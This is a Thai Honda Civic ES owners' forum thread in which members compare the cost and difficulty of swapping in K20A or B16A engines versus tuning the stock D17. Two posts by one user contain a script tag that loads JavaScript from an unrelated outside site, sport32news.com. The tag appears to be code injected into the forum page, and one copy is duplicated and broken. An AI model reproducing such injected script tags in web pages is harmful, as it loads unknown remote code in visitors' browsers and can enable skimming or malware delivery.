ตอบ
tham_noom


เข้าร่วม: 29 มีนา 2010
ตอบ: 23

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 18
ให้คำขอบคุณ: 0
เสาร์, 18 กันยา 2010 21:00 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม ถ้าวาง B16A ใน ES ต้องแปลงเยอะไหมคับ

เพลาต้องมีการตัดต่อไหม แล้วมันจะจบไหมคับผม แนะนำหน่อยคับผม เพราะ b16a ราคาไม่แรงเหมือน k20a

แล้วเครื่อง K20A กับ B16A เครื่องหันไปทางเดียวกันไหม

ขอบคุณมาก ๆ เลยคับผม
ake_es


ชื่อเล่น: เอก

เข้าร่วม: 01 มิถุนา 2009
ตอบ: 838

Guru ES
Guru ES

ได้รับคำขอบคุณ: 710
ให้คำขอบคุณ: 244

ที่อยู่: ดอนเมือง
เสาร์, 18 กันยา 2010 22:28 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
รอฟังด้วยคนครับ
curran


ชื่อเล่น: บี

เข้าร่วม: 07 กันยา 2009
ตอบ: 4300

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2057
ให้คำขอบคุณ: 5484

ที่อยู่: Samutprakarn
ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 18 กันยา 2010 22:57 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
รอเกบข้อมูลครับ อิอิ
vamps


ชื่อเล่น: เต้ย

เข้าร่วม: 09 มกรา 2009
ตอบ: 521

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1192
ให้คำขอบคุณ: 394

ที่อยู่: บางกอก
ปี: 2001
อาทิตย์, 19 กันยา 2010 00:26 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
ปูเสื่อรออีก 1 ครับ search มาก้เยอะแล้วยังไม่เจอจั๋งๆให้กระจ่างซักที
marcuz


ชื่อเล่น: เพชร

เข้าร่วม: 08 ตุลา 2008
ตอบ: 576

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 810
ให้คำขอบคุณ: 325

ปี: 2002
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 19 กันยา 2010 02:38 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
ตอบแบบคร่าวๆ น่ะครับ ถ้าจะวางแบบเนียนๆเลยไม่ต้องทุบห้องเครื่องไม่ต้องแปลงอะไรเลย ก็วาง k ไปเหอะครับคิดแค่ค่าเครื่องน่ะ

ครับ ก็ประมาณ 200,000 บาทรับทุกอย่าง ค่าวางไรอีกก็เกือบ 300,000 อ่ะครับ

แต่ถ้าเครื่อง b ก็ต้องแปลงเยอะนิดส์นึง ทำกับอู่ที่ชำนาญก็จบครับ

เครื่อง b กับ k หันไปคนล่ะทางกันน่ะครับ งบเยอะก็จัดตระกูล k ไปเลยครับ
ได้รับคำขอบคุณจาก: kaorjang  kittidech  honeybeex7  Lee_ES_turbo  vamps  soda_get 
jonatan


ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ที่อยู่: ประชาอุทิศ - สุขสวัสดิ์ - สีลม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 19 กันยา 2010 08:48 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
งบเยอะก็ตระกูล K ดีกว่าอ่ะคับ
เครื่องสดกว่าเยอะ ทันสมัยกว่า แรงม้าเพียบ
เครื่องสวยกว่าเยอะ ยังงัยก็ รอกูรู ที่สาวก K มาตอบล่ะกัน
ได้รับคำขอบคุณจาก: kaorjang  soda_get 
day2520


เข้าร่วม: 23 มีนา 2010
ตอบ: 873

Guru ES
Guru ES

ได้รับคำขอบคุณ: 649
ให้คำขอบคุณ: 303

ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 19 กันยา 2010 12:49 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
marcuz พิมพ์ว่า:
ตอบแบบคร่าวๆ น่ะครับ ถ้าจะวางแบบเนียนๆเลยไม่ต้องทุบห้องเครื่องไม่ต้องแปลงอะไรเลย ก็วาง k ไปเหอะครับคิดแค่ค่าเครื่องน่ะ

ครับ ก็ประมาณ 200,000 บาทรับทุกอย่าง ค่าวางไรอีกก็เกือบ 300,000 อ่ะครับ

แต่ถ้าเครื่อง b ก็ต้องแปลงเยอะนิดส์นึง ทำกับอู่ที่ชำนาญก็จบครับ

เครื่อง b กับ k หันไปคนล่ะทางกันน่ะครับ งบเยอะก็จัดตระกูล k ไปเลยครับ



300000 เลยหรอครับ แบบนี้ขายรถไปเล่น fd จะคุมกว่าไมอะครับ
liverpool_art


ชื่อเล่น: อาร์ต

เข้าร่วม: 13 พฤศจิกา 2009
ตอบ: 560

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 676
ให้คำขอบคุณ: 1116

ที่อยู่: บางกรวย
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
อาทิตย์, 19 กันยา 2010 15:52 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
ถ้าเรื่องนี้ ต้องให้คุณ ลี มาตอบครับ เก็ตแน่
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 19 กันยา 2010 16:17 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
day2520 พิมพ์ว่า:
marcuz พิมพ์ว่า:
ตอบแบบคร่าวๆ น่ะครับ ถ้าจะวางแบบเนียนๆเลยไม่ต้องทุบห้องเครื่องไม่ต้องแปลงอะไรเลย ก็วาง k ไปเหอะครับคิดแค่ค่าเครื่องน่ะ

ครับ ก็ประมาณ 200,000 บาทรับทุกอย่าง ค่าวางไรอีกก็เกือบ 300,000 อ่ะครับ

แต่ถ้าเครื่อง b ก็ต้องแปลงเยอะนิดส์นึง ทำกับอู่ที่ชำนาญก็จบครับ

เครื่อง b กับ k หันไปคนล่ะทางกันน่ะครับ งบเยอะก็จัดตระกูล k ไปเลยครับ



300000 เลยหรอครับ แบบนี้ขายรถไปเล่น fd จะคุมกว่าไมอะครับ



300000+ราคารถเราที่จะขาย ก็น่าจะได้ FD ป้ายแดงอยู่ครับ แต่เราก็ต้องเอามาแต่งเพิ่มความหล่ออีก แน่นอนรถเราแรงขึ้นนิดหน่อย และทันสมันอยู่ในปัจจุบัน แต่ว่าที่สำคัญ K20A อ่ะ ได้ 220 ม้านะครับ FD ยังไงก้ไม่ถึง
ป.ล.ข้อมูล งูๆปลาๆ จำจากพี่ๆในคลับทั้งนั้น

"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: es330 
es_mania


ชื่อเล่น: แมน

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1208

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2641
ให้คำขอบคุณ: 1357

ที่อยู่: สุขุมวิท 101 - ม.สวนดุสิต
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 19 กันยา 2010 19:45 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
3แสน แน่นอนคับ วันก่อนไปเชคมากะทางอู๋ v pro
pimniyoum


ชื่อเล่น: เค

เข้าร่วม: 06 ธันวา 2008
ตอบ: 414

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 306
ให้คำขอบคุณ: 11

ที่อยู่: บางพลี บางนา ม.หัวเฉียว
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 19 กันยา 2010 20:33 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
ลองดูตระกูลfกับhดูึัคับน่าสนใจราคาไม่แรงมากค่าเครื่องพร้อมวางไม่เกิน1แสน
WIT_ES MANIA


เข้าร่วม: 01 ตุลา 2008
ตอบ: 865

Guru ES
Guru ES

ได้รับคำขอบคุณ: 887
ให้คำขอบคุณ: 327

ที่อยู่: ตลาดป่าโมก จ.อ่างทอง
อาทิตย์, 19 กันยา 2010 21:34 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
เครื่องเดิมดีที่สุดแล้วครับ
ได้รับคำขอบคุณจาก: honeybeex7  Saka  kittidech  Lee_ES_turbo  alit  ohm  vamps  soda_get 
~ สเตฟาน ~


ชื่อเล่น: สเตฟาน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

ที่อยู่: รังสิต ประดิพัทธิ์
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 19 กันยา 2010 22:34 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
300,000 คือราคาเครื่อง+ของที่ได้มา+ค่าวาง
ได้รับคำขอบคุณจาก: honeybeex7 
jukkadui


ชื่อเล่น: แบงค์

เข้าร่วม: 05 พฤษภาคม 2010
ตอบ: 1362

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 769
ให้คำขอบคุณ: 1427

ที่อยู่: บางพลี
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 19 กันยา 2010 23:56 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
เจอราคางี้ งงเลย
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
จันทร์, 20 กันยา 2010 00:00 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
WIT_ES MANIA พิมพ์ว่า:
เครื่องเดิมดีที่สุดแล้วครับ


ประสบการณ์ตรงแน่เลย
number1lady


ชื่อเล่น: แพรว

เข้าร่วม: 23 กรกฎา 2009
ตอบ: 152

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 278
ให้คำขอบคุณ: 279

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 20 กันยา 2010 00:37 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
ถ้าไปบอกแม่ว่าขอเงินวางเครื่องใหม่ประมาน3แสน แม่คงตอบว่า แม่ดาวน์คันใหม่ให้เอามั้ยลูก !!!!

ได้รับคำขอบคุณจาก: PlamOriginalStyle 
u5216381


เข้าร่วม: 13 มีนา 2010
ตอบ: 3

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 17
ให้คำขอบคุณ: 0
จันทร์, 20 กันยา 2010 01:15 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
เพื่อนผมวาง อยุ่ ใน Es 01 ทำอู่ Kar racing ตรงหทัยราษ จบไปประมาน160,000 บี16 ได้เลข 59 มาด้วยแพงหน่อยแต่ชัวร์ สิ่งที่มันได้ เห็น บอกว่าเฉพาะท่อนล่างนะที่จำได้ก้อ มีครัช orc เกียร์ code เฟืองท้าย 4.9 ท่อบบน แคม 18 cr สปริงวาล รีเทนเน่อ Skunk2 สโป็คเก๊ทแคม และอื่นๆ เคม ม้าได้ 180 +ฟลายวิล กล่องโมรอม พี่เบิร์ด วีโปร รถ สีขาว อะครับ แปะสติกเก่อ Narakaแดง แต่มันไม่ได้อยุ่ในคลับนี้ แต่ท้า จาวางแสตนดาร์ดแบบ ไม่โม ก้อไม่รุ้นะจะจบที่เท่าไหร่ ลองหาๆ ข้อมูลดูครับ ที่ชัวๆ พี่ กล้าเรซซิ่ง ชื่อแก ก้อไม่ธรรมดา
ท้าวาง k ไม่ไหวก้อลองเสตปนี้ดู B ข้อดี มันตรง อะไหล่ หาง่าย แต่เค ทั่งหายากทั่งแพง ข้อดี แค่สด กะ เทคโนโลยี ดีกว่าแต่ ระดับ สตรีทยูส ทำขับสนุกแค่B16 ก้อพอและครับ และก้อ ท้า ตระกูล H กับ F ไม่แนะนำอย่างแรง ไม่มีความแรงเลยเหอๆ B16 โดนตั้งกะต้นจากประสบการนะครับ แล้วอิกอย่าง บล็อคบี มันไปได้ไกลพอตัว ท้าเบื่อๆ ก้อยกท่อนล่าง 20 มาก้อได้ เค มันใหม่ สด และเหนียว จิงแต่ ท้าถามว่า วันนืงท้าเกียร์มันพังหละ จับไรชนมันได้บ่างแต่ท้า บี มันยังเอา 16 Bหรือ 18 ดำหรือแดง ยังพอชนได้ ลองคิดการไกล้ด้วยครับ อิกอย่างบล็อค K มันขื้นอยู่กับคนทำและจูนด้วยท้าใคร เคยไป ไดโนคิง ลองถาม คนชื่อ โจ ดูครับเขาเป็นคนดูแล เคที่ว่า เหนียวแสตนดาร์ดท้าได้ที่ทำไม่ดี นี่เคย ระเบิดกลางไดโน มาก้อมีครับ ปัจจัย มันเยอะตามมาด้วยท้าคิดจาทำ แล้วกล้าเสี่ยง ก้อทำครับ แต่มันก้อไม่ได้ เปนแบบนี้เสมอไปหลอกแค่ตอนนี้ก้อมีตัวอย่างไห้เห็นๆ 300 k ทำบี เต็มๆก้อเหนียวครับ แล้วอิกอย่าง วางเค มันก้อต้องแปลง แต่แค่แปลงน้อยกว่า บี มาก ไม่ได้ มีอคติ กะ K นะ ผมก้อชอบแต่แค่ไม่ชอบตรงราคากับความลำบากที่ต้องเจอในพายพากหน้าเท่านั้น แหละ ^^
ได้รับคำขอบคุณจาก: Saka  honeybeex7  mark_es03  pooza191  future  vamps  whitechoc  Myson  bapil  Nack_Non  converse  PlamOriginalStyle  Zoulmate_Es 
tham_noom


เข้าร่วม: 29 มีนา 2010
ตอบ: 23

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 18
ให้คำขอบคุณ: 0
จันทร์, 20 กันยา 2010 10:57 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
u5216381 พิมพ์ว่า:
เพื่อนผมวาง อยุ่ ใน Es 01 ทำอู่ Kar racing ตรงหทัยราษ จบไปประมาน160,000 บี16 ได้เลข 59 มาด้วยแพงหน่อยแต่ชัวร์ สิ่งที่มันได้ เห็น บอกว่าเฉพาะท่อนล่างนะที่จำได้ก้อ มีครัช orc เกียร์ code เฟืองท้าย 4.9 ท่อบบน แคม 18 cr สปริงวาล รีเทนเน่อ Skunk2 สโป็คเก๊ทแคม และอื่นๆ เคม ม้าได้ 180 +ฟลายวิล กล่องโมรอม พี่เบิร์ด วีโปร รถ สีขาว อะครับ แปะสติกเก่อ Narakaแดง แต่มันไม่ได้อยุ่ในคลับนี้ แต่ท้า จาวางแสตนดาร์ดแบบ ไม่โม ก้อไม่รุ้นะจะจบที่เท่าไหร่ ลองหาๆ ข้อมูลดูครับ ที่ชัวๆ พี่ กล้าเรซซิ่ง ชื่อแก ก้อไม่ธรรมดา
ท้าวาง k ไม่ไหวก้อลองเสตปนี้ดู B ข้อดี มันตรง อะไหล่ หาง่าย แต่เค ทั่งหายากทั่งแพง ข้อดี แค่สด กะ เทคโนโลยี ดีกว่าแต่ ระดับ สตรีทยูส ทำขับสนุกแค่B16 ก้อพอและครับ และก้อ ท้า ตระกูล H กับ F ไม่แนะนำอย่างแรง ไม่มีความแรงเลยเหอๆ B16 โดนตั้งกะต้นจากประสบการนะครับ แล้วอิกอย่าง บล็อคบี มันไปได้ไกลพอตัว ท้าเบื่อๆ ก้อยกท่อนล่าง 20 มาก้อได้ เค มันใหม่ สด และเหนียว จิงแต่ ท้าถามว่า วันนืงท้าเกียร์มันพังหละ จับไรชนมันได้บ่างแต่ท้า บี มันยังเอา 16 Bหรือ 18 ดำหรือแดง ยังพอชนได้ ลองคิดการไกล้ด้วยครับ อิกอย่างบล็อค K มันขื้นอยู่กับคนทำและจูนด้วยท้าใคร เคยไป ไดโนคิง ลองถาม คนชื่อ โจ ดูครับเขาเป็นคนดูแล เคที่ว่า เหนียวแสตนดาร์ดท้าได้ที่ทำไม่ดี นี่เคย ระเบิดกลางไดโน มาก้อมีครับ ปัจจัย มันเยอะตามมาด้วยท้าคิดจาทำ แล้วกล้าเสี่ยง ก้อทำครับ แต่มันก้อไม่ได้ เปนแบบนี้เสมอไปหลอกแค่ตอนนี้ก้อมีตัวอย่างไห้เห็นๆ 300 k ทำบี เต็มๆก้อเหนียวครับ แล้วอิกอย่าง วางเค มันก้อต้องแปลง แต่แค่แปลงน้อยกว่า บี มาก ไม่ได้ มีอคติ กะ K นะ ผมก้อชอบแต่แค่ไม่ชอบตรงราคากับความลำบากที่ต้องเจอในพายพากหน้าเท่านั้น แหละ ^^
ขอบคุณคับผม
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 20 กันยา 2010 11:12 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
number1lady พิมพ์ว่า:
ถ้าไปบอกแม่ว่าขอเงินวางเครื่องใหม่ประมาน3แสน แม่คงตอบว่า แม่ดาวน์คันใหม่ให้เอามั้ยลูก !!!!




<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
u5216381


เข้าร่วม: 13 มีนา 2010
ตอบ: 3

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 17
ให้คำขอบคุณ: 0
จันทร์, 20 กันยา 2010 11:25 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
ท้ามีไรสงสัย หรือคำถามก้อลอง @มาก้อได้ครับ vergin_love@hotmail.com ไหนๆก้ออยากจำทำ ก่อนทำเตรียมข้อมูลไว้หน่อย เอาเปนว่าอยากรุ้เรื่องไรเดียวผมอาจจะช่วยหาข้อมูลมาไห้ ละกันครับ เดียวไงท้าผมมี เวลาจาเอารูป มาลงไห้ละกันพร้อมกะกราฟแรงม้า ^^ จะได้หายสงสัย
ได้รับคำขอบคุณจาก: honeybeex7  mark_es03  blacksix 
Lee_ES_turbo


เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
จันทร์, 20 กันยา 2010 12:25 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
ไม่ลองเล่นเครื่องตัวนี้ให้สุดก่อนหรอคับ มีไรให้เล่นอีกเยอะนะคับ เครื่อง D17 ใน ES เราเนี่ย เล่น NA ที่อเมกาทำเต็มทำม้าสูดสุดได้ถึง 200 กว่าม้าลงพื้นเลยนะคับ แค่เปลี่ยนลูก ก้าน ชาฟ แคม สปริงวาร์ว รีเทนเนอร์ พูเล่อลูมิเนียม ล้างหน้าflywheel LSD ไม่ได้น้อยหน้าพวก B16 เลยนะคับ หรือเล่นแนว turbo ก่อมีให้เห็นอยู่เยอะเเยะ 400-500 ม้าทั้งนั้น ดีกว่าวางเครื่องแล้วไม่จบนะคับ ถ้าวางแล้วจบก่อดีคับ แต่อยากแนะนำเล่นเครื่อง D17 อ่ะคับ จิงๆนะ คิคิ
ได้รับคำขอบคุณจาก: honeybeex7  kittidech  vamps  soda_get  poom844  l0899693136  PlamOriginalStyle 
RedH


เข้าร่วม: 01 ตุลา 2008
ตอบ: 574

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 2162
ให้คำขอบคุณ: 1015

ปี: 2004
จันทร์, 20 กันยา 2010 12:25 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
เสริม อีกนิดนะครับ จริงๆ ตระกูล B ก็ดีครับ ใช้งบน้อยครับ แต่ถ้าอยากแรงก็ต้อง เพิ่ม step พอควร
สิ่งที่ต้อง concern อีกอย่างคือ น้ำหนักของรถ ในความเห็นส่วนตัว ผมว่า B มันแบกนำหนักโครง Es เยอะไปหน่อยครับ
และจุดยึดต่างๆ ต้องแปลงเยอะพอควรครับ เคยคิดเหมือนกันครับ แต่ส่วนตัวผมมาจบที่ K เพราะ body เรา จริงๆ มัน
รับกับ K20A มากกว่าแต่เรื่อง งบประมาณ ก้อย่างที่คุณ "u5216381" บอกน่ะครับว่า ราคานี้ซื้อป้ายแดงได้เลย
แต่ตระกูล H และ F ไม่แนะนำครับ อันนี้แปลงเยอะ รถ ช้ำ และแบกน้ำหนักเยอะเกิน ที่ผมเลือก K เพราะ แรงใน stadard
และจบแน่นอน รถไม่ช้ำ และเพิ่ม step ได้ เครื่องเหนียว ในกรณีใช้งานแบบ ปกติ ไม่ได้เอาไปลงแข่งนะครับ
ผมคิดว่าถ้าอยากแรง อันนี้น่าจะจบ

อันนี้เป็นความเห็นส่วนตัวนะครับ ต้องดูเหตุผลที่คุณจะวางด้วยนะครับ เพราะถ้าไม่ได้คิดอยากจะแรง และใช้งานต่อ ยาวๆ
ผมว่าลองเอา เครื่องเดิมๆ โม step ต้นๆ ก็วิ่งกระจายแล้วครับ ฃีวิตประจำวัน เราคงไม่มีโอกาส ขับ ขนาด 170-200 หรอกครับ
เครื่องเดิมผมเป็น 1.7 ใส่กรองเปลือย + header + ท่อ mugen + ล้อ forge เท่านี้ก็ขับสนุกแล้วครับ
ทั้งนี้ทั้ง ลองดูเหตุผลที่จะวาง และ งบประมาณนะครับ จริงๆ ถ้าคุณมี งบ ซัก 1 แสน ลอง จัด step ต้น กับเครื่องเดิม
ก็ขับสนุกแล้วนะครับ


แก้ไขล่าสุดโดย เมื่อ จันทร์, 20 กันยา 2010 14:34, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Lee_ES_turbo  tokykung  honeybeex7  kittidech  Nung_Sodapop  vamps  jk2475  bapil  perm  soda_get  Nack_Non 
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 20 กันยา 2010 13:08 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
agelus พิมพ์ว่า:
เสริม อีกนิดนะครับ จริงๆ ตระกูล B ก็ดีครับ ใช้งบน้อยครับ แต่ถ้าอยากแรงก็ต้อง เพิ่ม step พอควร
สิ่งที่ต้อง concern อีกอย่างคือ น้ำหนักของรถ ในความเห็นส่วนตัว ผมว่า B มันแบก โครง Es เยอะไปหน่อยครับ
แลพจุดยึดต่างๆ แปลงเยอะครับ เคยคิดเหมือนกันครับ แต่ส่วนตัวผมมาจบที่ K เพราะ body เรา จริงๆ มัน รับกับ K20A มากกว่า
แต่เรื่อง งบประมาณ ก้อย่างที่คุณ "u5216381" บอกน่ะครับว่า ราคานี้ซื้อป้ายแดงได้เลย แต่ตระกูล H และ F ไม่แนะนำครับ
อันนี้แปลกเยอะ รถ ช้ำ และแบกน้ำหนักเยอะเกิน ที่ผมเลือก K เพระ แรงใน stadard และจบแน่นอน รถไม่ช้ำ และเพิ่ม step ได้
เครื่องเหนียว ในกรณีใช้งานแบบ ปกติ ไม่ได้เอาไปลงแข่งนะครับ ผมคิดว่าถ้าอยากแรง อันนี้น่าจะจบ
อันนี้เป็นความเห็นส่วนตัวนะครับ ต้องดูเหตุผลที่คุณจะวางด้วยนะครับ เพราะถ้าไม่ได้คิดอยากจะแรง และใช้งานต่อ ยาวๆ
ผมว่าลองเอา เครื่องเดิมๆ โม step ต้นๆ ก็วิ่งกระจายแล้วครับ ฃีวิตประจำวัน เราคงไม่มีโอกาส ขับ ขนาด 170-200 หรอกครับ
เครื่องเดิมผมเป็น 1.7 ใส่กรองเลปือย + header + ท่อ mugen + ล้อ forge เท่านี้ก็ขับสนุกแล้วครับ
ทั้งนี้ทั้ง ลองดูเหตุผลที่จะวาง และ งบประมาณนะครับ จริงๆ ถ้าคุณมี งบ ซัก 1 แสน ลอง จัด step ต้น กับเครื่องเดิม
ก็ขับสนุกแล้วนะครับ



เข้าไปดูกระทู้แปลงร่างพี่มาแล้ว ชอบครับ ความคิดพี่เป็นผู้ใหญ่มากเลย
ป.ล.ส่วนตัวผมก็คงเอา เครื่องเดิมค่อยๆโมไปทีละนิดๆ พอใจแล้ว แรงจัดกลัวอยู่ไม่ถึงแก่
RedH


เข้าร่วม: 01 ตุลา 2008
ตอบ: 574

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 2162
ให้คำขอบคุณ: 1015

ปี: 2004
จันทร์, 20 กันยา 2010 14:35 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
honeybeex7 พิมพ์ว่า:
agelus พิมพ์ว่า:
เสริม อีกนิดนะครับ จริงๆ ตระกูล B ก็ดีครับ ใช้งบน้อยครับ แต่ถ้าอยากแรงก็ต้อง เพิ่ม step พอควร
สิ่งที่ต้อง concern อีกอย่างคือ น้ำหนักของรถ ในความเห็นส่วนตัว ผมว่า B มันแบก โครง Es เยอะไปหน่อยครับ
แลพจุดยึดต่างๆ แปลงเยอะครับ เคยคิดเหมือนกันครับ แต่ส่วนตัวผมมาจบที่ K เพราะ body เรา จริงๆ มัน รับกับ K20A มากกว่า
แต่เรื่อง งบประมาณ ก้อย่างที่คุณ "u5216381" บอกน่ะครับว่า ราคานี้ซื้อป้ายแดงได้เลย แต่ตระกูล H และ F ไม่แนะนำครับ
อันนี้แปลกเยอะ รถ ช้ำ และแบกน้ำหนักเยอะเกิน ที่ผมเลือก K เพระ แรงใน stadard และจบแน่นอน รถไม่ช้ำ และเพิ่ม step ได้
เครื่องเหนียว ในกรณีใช้งานแบบ ปกติ ไม่ได้เอาไปลงแข่งนะครับ ผมคิดว่าถ้าอยากแรง อันนี้น่าจะจบ
อันนี้เป็นความเห็นส่วนตัวนะครับ ต้องดูเหตุผลที่คุณจะวางด้วยนะครับ เพราะถ้าไม่ได้คิดอยากจะแรง และใช้งานต่อ ยาวๆ
ผมว่าลองเอา เครื่องเดิมๆ โม step ต้นๆ ก็วิ่งกระจายแล้วครับ ฃีวิตประจำวัน เราคงไม่มีโอกาส ขับ ขนาด 170-200 หรอกครับ
เครื่องเดิมผมเป็น 1.7 ใส่กรองเลปือย + header + ท่อ mugen + ล้อ forge เท่านี้ก็ขับสนุกแล้วครับ
ทั้งนี้ทั้ง ลองดูเหตุผลที่จะวาง และ งบประมาณนะครับ จริงๆ ถ้าคุณมี งบ ซัก 1 แสน ลอง จัด step ต้น กับเครื่องเดิม
ก็ขับสนุกแล้วนะครับ



เข้าไปดูกระทู้แปลงร่างพี่มาแล้ว ชอบครับ ความคิดพี่เป็นผู้ใหญ่มากเลย
ป.ล.ส่วนตัวผมก็คงเอา เครื่องเดิมค่อยๆโมไปทีละนิดๆ พอใจแล้ว แรงจัดกลัวอยู่ไม่ถึงแก่


ขอบคุณครับ
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 20 กันยา 2010 15:12 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
Lee_ES_turbo พิมพ์ว่า:
ไม่ลองเล่นเครื่องตัวนี้ให้สุดก่อนหรอคับ มีไรให้เล่นอีกเยอะนะคับ เครื่อง D17 ใน ES เราเนี่ย เล่น NA ที่อเมกาทำเต็มทำม้าสูดสุดได้ถึง 200 กว่าม้าลงพื้นเลยนะคับ แค่เปลี่ยนลูก ก้าน ชาฟ แคม สปริงวาร์ว รีเทนเนอร์ พูเล่อลูมิเนียม ล้างหน้าflywheel LSD ไม่ได้น้อยหน้าพวก B16 เลยนะคับ หรือเล่นแนว turbo ก่อมีให้เห็นอยู่เยอะเเยะ 400-500 ม้าทั้งนั้น ดีกว่าวางเครื่องแล้วไม่จบนะคับ ถ้าวางแล้วจบก่อดีคับ แต่อยากแนะนำเล่นเครื่อง D17 อ่ะคับ จิงๆนะ คิคิ

พี่ลี หาพวกโบเหมือนกันล่ะสิ อนาคตผมจะไปให้ได้เหมือนพี่ พี่เป็น Idol ของผมครับ
ohm


ชื่อเล่น: โอม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 1081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3634
ให้คำขอบคุณ: 3340

ที่อยู่: บางกรวย นนทบุรี
ปี: 2002
จันทร์, 20 กันยา 2010 15:34 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
WIT_ES MANIA พิมพ์ว่า:
เครื่องเดิมดีที่สุดแล้วครับ

